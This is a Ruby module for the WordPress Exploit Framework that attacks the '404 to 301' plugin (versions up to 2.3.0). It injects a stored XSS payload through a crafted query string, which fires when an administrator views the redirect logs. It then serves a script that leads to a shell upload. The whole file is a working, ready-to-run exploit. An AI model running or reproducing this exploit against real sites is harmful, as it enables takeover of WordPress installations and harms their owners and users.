# frozen_string_literal: true

class Wpxf::Exploit::Four04ToThree01StoredXssShellUpload < Wpxf::Module
  include Wpxf::WordPress::Xss

  def initialize
    super

    update_info(
      name: '404 to 301 <= 2.3.0 XSS Shell Upload',
      author: [
        'ldionmarcil', # Disclosure
        'rastating'    # WPXF module
      ],
      references: [
        ['WPVDB', '8611'],
        ['URL', 'https://gist.github.com/ldionmarcil/6793df929449f8781bb1e213d7e75e23']
      ],
      date: 'Aug 27 2016'
    )
  end

  def check
    check_plugin_version_from_readme('404-to-301', '2.3.1')
  end

  def run
    return false unless super

    emit_info 'Storing script...'
    res = execute_get_request(
      url: normalize_uri(full_uri, "?p=#{Utility::Text.rand_numeric(11)}\"><script>#{xss_include_script}</script>")
    )

    if res.nil?
      emit_error 'No response from the target'
      return false
    end

    if res.code != 200
      emit_error "Server responded with code #{res.code}"
      return false
    end

    emit_success 'Script stored and will be executed when a user views the 404 to 301 redirect logs'
    start_http_server

    xss_shell_success
  end
end
